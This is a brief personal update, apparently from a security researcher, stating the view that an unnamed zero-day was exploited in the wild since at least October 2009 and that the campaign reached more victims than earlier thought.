My personal opinion is that:

  • I can clearly confirm that the zero-day was exploited in the wild since at least October 2009 (previously stated as February 2013)
  • the campaign has been active for a while and has surely targeted other victims than previously thought.

I will keep you posted with additional information.